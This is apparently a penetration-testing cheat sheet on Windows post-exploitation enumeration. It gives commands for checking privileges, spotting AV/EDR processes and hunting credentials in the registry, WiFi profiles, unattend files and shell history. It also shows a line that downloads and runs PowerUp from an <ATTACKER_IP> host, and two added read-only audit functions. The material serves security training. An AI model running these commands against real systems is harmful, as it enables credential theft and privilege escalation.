Enumeration & Situational Awareness
You have a shell. Before exploiting anything, understand where you are, what you have, and what's misconfigured. This page covers manual enumeration and automated tools.
Current User Context
Who you are and what privileges you hold.
PS C:\> whoami
PS C:\> whoami /priv
PS C:\> whoami /groups
PS C:\> whoami /all
Run whoami /priv immediately. If you see SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeDebugPrivilege, SeBackupPrivilege, or SeRestorePrivilege enabled, you likely have a direct path to SYSTEM (see the Token & Potato Attacks page).
System Information
OS version, architecture, and patch level.
PS C:\> systeminfo
Just the OS name and version.
PS C:\> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
List installed hotfixes (look for missing patches).
PS C:\> wmic qfe list brief
PS C:\> Get-HotFix | Sort-Object -Property InstalledOn -Descending
Check architecture (32-bit vs 64-bit).
PS C:\> [Environment]::Is64BitOperatingSystem
PS C:\> [Environment]::Is64BitProcess
User & Group Enumeration
List local users.
PS C:\> net user
Details on a specific user.
PS C:\> net user <USER>
List local groups.
PS C:\> net localgroup
Members of the local Administrators group.
PS C:\> net localgroup Administrators
Check if current user is in any interesting groups.
PS C:\> net localgroup "Remote Desktop Users"
PS C:\> net localgroup "Remote Management Users"
PS C:\> net localgroup "Backup Operators"
Network Information
Network interfaces and IP addresses.
PS C:\> ipconfig /all
Routing table (check for dual-homed hosts or internal subnets).
PS C:\> route print
ARP cache (discover other hosts on the local network).
PS C:\> arp -a
Active connections and listening ports.
PS C:\> netstat -ano
Filter for listening ports only.
PS C:\> netstat -ano | findstr LISTENING
DNS cache (reveals recently resolved internal hostnames).
PS C:\> ipconfig /displaydns
Firewall status and rules.
PS C:\> netsh advfirewall show allprofiles
PS C:\> netsh advfirewall firewall show rule name=all
Process & Service Enumeration
List running processes.
PS C:\> tasklist /v
PS C:\> Get-Process | Select-Object Id, ProcessName, Path
Check for AV/EDR processes.
PS C:\> tasklist /v | findstr /i "defender symantec crowdstrike carbon sentinel mcafee sophos cylance"
List running services.
PS C:\> Get-Service | Where-Object {$_.Status -eq 'Running'}
PS C:\> wmic service list brief
Find services running as SYSTEM or with high-privilege accounts.
PS C:\> Get-WmiObject win32_service | Select-Object Name, StartName, PathName, State | Where-Object {$_.State -eq 'Running'} | Format-Table -AutoSize
Services running as LocalSystem, NT AUTHORITY\SYSTEM, or a domain admin account are high-value targets. If you can hijack the binary or modify the service config, you escalate to that account.
Installed Software
List installed software.
PS C:\> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName, DisplayVersion, InstallDate
32-bit software on 64-bit OS.
PS C:\> Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName, DisplayVersion
Check Program Files directories.
PS C:\> dir "C:\Program Files"
PS C:\> dir "C:\Program Files (x86)"
Credential Hunting
Saved Credentials
Check for saved credentials in Windows Credential Manager.
PS C:\> cmdkey /list
If credentials are saved, use them with runas.
PS C:\> runas /savecred /user:<USER> cmd.exe
Files with Credentials
Search for files that commonly contain passwords.
PS C:\> findstr /si "password" *.txt *.xml *.ini *.config *.cfg
PS C:\> cmd /c dir /s /b *pass*.txt *pass*.xml *cred* *vnc* *.config 2>$null
Check common locations.
PS C:\> type C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type C:\Windows\System32\drivers\etc\hosts
PS C:\> type C:\Windows\Panther\Unattend.xml
PS C:\> type C:\Windows\Panther\unattend\Unattend.xml
PS C:\> type C:\Windows\system32\sysprep\sysprep.xml
PS C:\> type C:\Windows\system32\sysprep\Unattend.xml
Registry Credentials
AutoLogon credentials.
PS C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
PS C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
VNC passwords.
PS C:\> reg query "HKCU\SOFTWARE\ORL\WinVNC3\Password"
PS C:\> reg query "HKCU\SOFTWARE\TightVNC\Server" /v Password
PuTTY stored sessions (may contain proxy credentials).
PS C:\> reg query "HKCU\SOFTWARE\SimonTatham\PuTTY\Sessions" /s
SNMP community strings.
PS C:\> reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities"
Search registry for password strings.
PS C:\> reg query HKLM /f password /t REG_SZ /s 2>$null
PS C:\> reg query HKCU /f password /t REG_SZ /s 2>$null
WiFi Passwords
List saved WiFi profiles.
PS C:\> netsh wlan show profiles
Extract a specific WiFi password.
PS C:\> netsh wlan show profile name="<PROFILE_NAME>" key=clear
DPAPI Protected Secrets
List credential blobs.
PS C:\> dir C:\Users\<USER>\AppData\Local\Microsoft\Credentials
PS C:\> dir C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials
Scheduled Tasks
List all scheduled tasks.
PS C:\> schtasks /query /fo LIST /v
Look for tasks running as SYSTEM or high-privilege accounts with writable scripts/binaries.
PS C:\> schtasks /query /fo LIST /v | findstr /i /C:"Task To Run" /C:"Run As User" /C:"TaskName"
PS C:\> Get-ScheduledTask | Where-Object {$_.Principal.UserId -like '*SYSTEM*'} | Select-Object TaskName, @{N='Action';E={$_.Actions.Execute}}
Writable Directories & Files
Check for writable directories in PATH.
PS C:\> $env:Path -split ';' | ForEach-Object { icacls $_ 2>$null }
Check write permissions on common directories.
PS C:\> icacls "C:\Program Files" /t /c 2>$null | findstr /i "(F) (M) (W) (CI) (OI)"
PS C:\> icacls "C:\Program Files (x86)" /t /c 2>$null | findstr /i "(F) (M) (W) (CI) (OI)"
Find world-writable files and folders.
PS C:\> Get-ChildItem "C:\" -Recurse -ErrorAction SilentlyContinue | Where-Object { (Get-Acl $_.FullName).Access | Where-Object { $_.IdentityReference -match "Everyone|BUILTIN\\Users|Authenticated Users" -and $_.FileSystemRights -match "Write|Modify|FullControl" } } | Select-Object FullName
Service Binary & Config Permissions
Check permissions on service binaries.
PS C:\> Get-WmiObject win32_service | Where-Object {$_.State -eq 'Running'} | ForEach-Object { $p = $_.PathName.Trim(); if ($p -match '^"([^"]+)"') { $p = $Matches[1] } else { $p = $p.Split(' ')[0] }; Write-Host $_.Name "-" $p; icacls $p 2>$null }
Check if current user can modify service configurations.
PS C:\> sc qc <SERVICE_NAME>
PS C:\> Get-WmiObject win32_service | Select-Object Name, PathName, StartMode, StartName | Format-Table -AutoSize
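The icacls output above has to be read by eye for every running service. The following PowerShell function is an added example (not part of the original page) that does the same check programmatically: it parses Win32_Service.PathName, handling quoted and unquoted paths, and reports only ACL entries that grant write-type rights on a running service's binary to low-privilege principals. The principal list is an assumption and can be extended.

```powershell
# Added example, not part of the original page: report service binaries whose
# file ACL grants write-type rights to low-privilege principals. Read-only audit.
function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName may be quoted ("C:\Program Files\x\y.exe" -arg) or
    # unquoted (C:\Windows\system32\svchost.exe -k netsvcs). Return the binary only.
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p -match '^"([^"]+)"') { return $Matches[1] }
    return ($p -split '\s+')[0]
}

function Test-ServiceBinaryAcl {
    # Principals that should never be able to modify a service executable (assumed list).
    $lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                 'NT AUTHORITY\INTERACTIVE')
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.State -eq 'Running' } |
        ForEach-Object {
            $svc = $_
            $bin = Get-ServiceBinaryPath $svc.PathName
            if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
            foreach ($ace in (Get-Acl -LiteralPath $bin).Access) {
                # Only Allow ACEs for a low-privilege principal that carry a write bit matter.
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
                if (([int]$ace.FileSystemRights -band [int]$writeMask) -eq 0) { continue }
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Binary    = $bin
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
}

# Every row is a hardening finding: tighten the binary's ACL or change the service account.
Test-ServiceBinaryAcl | Format-Table -AutoSize
```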
AlwaysInstallElevated Check
If both registry keys are set to 1, you can install an MSI package as SYSTEM.
PS C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
PS C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both return 0x1, see the Service & Registry Exploits page for the MSI payload technique.
UAC Status
Check UAC configuration.
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy
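The AlwaysInstallElevated and UAC queries above return raw registry values that you then have to interpret. The following PowerShell function is an added example (not from the original page) that reads the same five values and reports only the risky settings, which makes these checks usable as a repeatable baseline audit; the Risk wording is the editor's, not the page's.

```powershell
# Added example, not part of the original page: evaluate the AlwaysInstallElevated
# and UAC policy values and report only the risky combinations. Read-only.
function Get-RegDword {
    param([string]$Path, [string]$Name)
    # $null means the value (or its key) is absent, i.e. the policy is not configured.
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-ElevationPolicy {
    $installer = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $system    = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    $aieMachine  = Get-RegDword "HKLM:\$installer" 'AlwaysInstallElevated'
    $aieUser     = Get-RegDword "HKCU:\$installer" 'AlwaysInstallElevated'
    $enableLua   = Get-RegDword $system 'EnableLUA'
    $adminPrompt = Get-RegDword $system 'ConsentPromptBehaviorAdmin'
    $tokenFilter = Get-RegDword $system 'LocalAccountTokenFilterPolicy'

    $findings = @()
    # Windows Installer elevates only when BOTH the machine and the user value are 1.
    if ($aieMachine -eq 1 -and $aieUser -eq 1) {
        $findings += [pscustomobject]@{ Setting = 'AlwaysInstallElevated'; Value = "HKLM=$aieMachine HKCU=$aieUser"; Risk = 'Any user can install MSI packages as SYSTEM' }
    }
    # EnableLUA = 0 switches UAC off entirely; absent or 1 means enabled.
    if ($enableLua -eq 0) {
        $findings += [pscustomobject]@{ Setting = 'EnableLUA'; Value = $enableLua; Risk = 'UAC disabled' }
    }
    # 0 = "Elevate without prompting" for administrators (the default, 5, prompts for consent).
    if ($adminPrompt -eq 0) {
        $findings += [pscustomobject]@{ Setting = 'ConsentPromptBehaviorAdmin'; Value = $adminPrompt; Risk = 'Administrators elevate silently' }
    }
    # 1 disables remote UAC token filtering for local administrator accounts.
    if ($tokenFilter -eq 1) {
        $findings += [pscustomobject]@{ Setting = 'LocalAccountTokenFilterPolicy'; Value = $tokenFilter; Risk = 'Local admins get full tokens over the network' }
    }
    return $findings
}

# No output means none of the risky settings is present on this host.
Test-ElevationPolicy | Format-Table -AutoSize
```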
EnableLUA = 0 means UAC is disabled. LocalAccountTokenFilterPolicy = 1 means remote logons with local admin accounts get full tokens (no UAC filtering over the network).
Automated Enumeration Tools
WinPEAS
Comprehensive automated enumeration (the go-to tool).
PS C:\> .\winPEASx64.exe
Quiet mode (less output, faster).
PS C:\> .\winPEASx64.exe quiet
Specific checks only.
PS C:\> .\winPEASx64.exe quiet servicesinfo
PS C:\> .\winPEASx64.exe quiet userinfo
PS C:\> .\winPEASx64.exe quiet filesinfo
PowerUp
PowerShell-based privesc enumeration.
PS C:\> . .\PowerUp.ps1
PS C:\> Invoke-AllChecks
Or load remotely.
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/PowerUp.ps1')
PS C:\> Invoke-AllChecks
Seatbelt
Detailed host survey and security configuration checks.
PS C:\> .\Seatbelt.exe -group=all
Specific modules.
PS C:\> .\Seatbelt.exe -group=user
PS C:\> .\Seatbelt.exe -group=system
PS C:\> .\Seatbelt.exe -group=misc
PrivescCheck
PowerShell alternative to WinPEAS.
PS C:\> . .\PrivescCheck.ps1
PS C:\> Invoke-PrivescCheck
Extended mode.
PS C:\> Invoke-PrivescCheck -Extended
SharpUp
C# version of PowerUp (better for AV evasion).
PS C:\> .\SharpUp.exe audit